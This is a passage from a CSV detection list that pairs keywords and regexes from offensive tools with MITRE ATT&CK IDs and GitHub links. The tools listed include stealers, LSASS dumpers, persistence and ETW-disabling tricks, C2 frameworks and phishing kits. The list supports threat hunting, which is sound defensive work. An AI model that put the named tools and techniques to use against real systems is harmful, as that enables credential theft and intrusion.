Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*# Inject: Inject payload into Discord?*",".{0,1000}\#\sInject\:\sInject\spayload\sinto\sDiscord\?.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*# Injection URL: Raw URL to injection payload*",".{0,1000}\#\sInjection\sURL\:\sRaw\sURL\sto\sinjection\spayload.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*# Perform the HTTP POST request to search 
emails*",".{0,1000}\#\sPerform\sthe\sHTTP\sPOST\srequest\sto\ssearch\semails.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*# Pop up the calculator when you start excel.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\sexcel\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*# Pop up the calculator when you start powerpoint.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\spowerpoint\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*# Pop up the calculator when you start winword.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\swinword\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*# socksport = 9050*",".{0,1000}\#\ssocksport\s\=\s9050.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*# Sticky Keys backdoor exists*",".{0,1000}\#\sSticky\sKeys\sbackdoor\sexists.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*## DLHell Main function*",".{0,1000}\#\#\sDLHell\sMain\sfunction.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*## Extracting Private Key from Active Directory Store*",".{0,1000}\#\#\sExtracting\sPrivate\sKey\sfrom\sActive\sDirectory\sStore.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*#1 - Smuggling binary via Service DisplayName*",".{0,1000}\#1\s\-\sSmuggling\sbinary\svia\sService\sDisplayName.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*#2 - Smuggling binary via WMI*",".{0,1000}\#2\s\-\sSmuggling\sbinary\svia\sWMI.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to 
smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*#Author Yehia Elghaly*",".{0,1000}\#Author\sYehia\sElghaly.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*#Bind Shell (Client) (XOR Algorithm)*",".{0,1000}\#Bind\sShell\s\(Client\)\s\(XOR\sAlgorithm\).{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*#Dumps exported function from legit DLL using winedump*",".{0,1000}\#Dumps\sexported\sfunction\sfrom\slegit\sDLL\susing\swinedump.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*#include ""RogueOxidResolver.h*",".{0,1000}\#include\s\""RogueOxidResolver\.h.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*#include ""ShoggothEngine.h""*",".{0,1000}\#include\s\""ShoggothEngine\.h\"".{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic 
Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*#Removes previous hijacked dll*",".{0,1000}\#Removes\sprevious\shijacked\sdll.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*$ADelegReport*",".{0,1000}\$ADelegReport.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*$AllCurrentPwdDiscovered*",".{0,1000}\$AllCurrentPwdDiscovered.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*$attacker_IPlist*",".{0,1000}\$attacker_IPlist.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*$BaseTicket | Select-String -Pattern 'doI.*",".{0,1000}\$BaseTicket\s\|\sSelect\-String\s\-Pattern\s\'doI\..{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell 
tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$C2_SERVER*",".{0,1000}\$C2_SERVER.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*$calcwllx64 = 
""TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4*",".{0,1000}\$calcwllx64\s\=\s\""TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\+AAAAA4.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*$calcwllx86 = ""TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4*",".{0,1000}\$calcwllx86\s\=\s\""TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*$CertutilDump*",".{0,1000}\$CertutilDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*$DummyServiceName*",".{0,1000}\$DummyServiceName.{0,1000}","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*$dumpDir\lsass.txt*",".{0,1000}\$dumpDir\\lsass\.txt.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*$DumpLsass=*",".{0,1000}\$DumpLsass\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$env:COMPlus_ETWEnabled=0*",".{0,1000}\$env\:COMPlus_ETWEnabled\=0.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? 
Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*$Env:TMP\Camera.ps1*",".{0,1000}\$Env\:TMP\\Camera\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$Env:TMP\GetLogs.ps1*",".{0,1000}\$Env\:TMP\\GetLogs\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$env:TMP\Leaked.txt*",".{0,1000}\$env\:TMP\\Leaked\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - 
T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$Env:TMP\Screenshot.ps1*",".{0,1000}\$Env\:TMP\\Screenshot\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$Env:TMP\StartWebServer.ps1*",".{0,1000}\$Env\:TMP\\StartWebServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" 
"*$Env:TMP\Start-WebServer.ps1*",".{0,1000}\$Env\:TMP\\Start\-WebServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$Env:TMP\tdfr.log*",".{0,1000}\$Env\:TMP\\tdfr\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$Env:TMP\Upload.ps1*",".{0,1000}\$Env\:TMP\\Upload\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - 
TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$Env:TMP\webserver.ps1.ps1*",".{0,1000}\$Env\:TMP\\webserver\.ps1\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$FilterArgs = @{ name='Notion'*EventNameSpace='root\\CimV2'*QueryLanguage=*WQL* Query=*SELECT * FROM __InstanceModificationE*",".{0,1000}\$FilterArgs\s\=\s\@\{\sname\=\'Notion\'.{0,1000}EventNameSpace\=\'root\\\\CimV2\'.{0,1000}QueryLanguage\=.{0,1000}WQL.{0,1000}\sQuery\=.{0,1000}SELECT\s.{0,1000}\sFROM\s__InstanceModificationE.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*$ForensikeFolder*",".{0,1000}\$ForensikeFolder.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*$FQDNDomainPlusAccountOperators*",".{0,1000}\$FQDNDomainPlusAccountOperators.{0,1000}","offensive_tool_keyword","PSMapExec","A 
PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$FQDNDomainPlusDomainAdmins*",".{0,1000}\$FQDNDomainPlusDomainAdmins.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$FQDNDomainPlusEnterpriseAdmins*",".{0,1000}\$FQDNDomainPlusEnterpriseAdmins.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$FQDNDomainPlusServerOperators*",".{0,1000}\$FQDNDomainPlusServerOperators.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$Hc2$w$c$rQW$d$s$w$b$Hc2$v$xZp$f$w$V9z$rQW$L$U$xZp*",".{0,1000}\$Hc2\$w\$c\$rQW\$d\$s\$w\$b\$Hc2\$v\$xZp\$f\$w\$V9z\$rQW\$L\$U\$xZp.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*$HOME/.tunneler*",".{0,1000}\$HOME\/\.tunneler.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*$InsecureResourceDelegations*",".{0,1000}\$InsecureResourceDelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*$InsecureTrusteeDelegations*",".{0,1000}\$InsecureTrusteeDelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - 
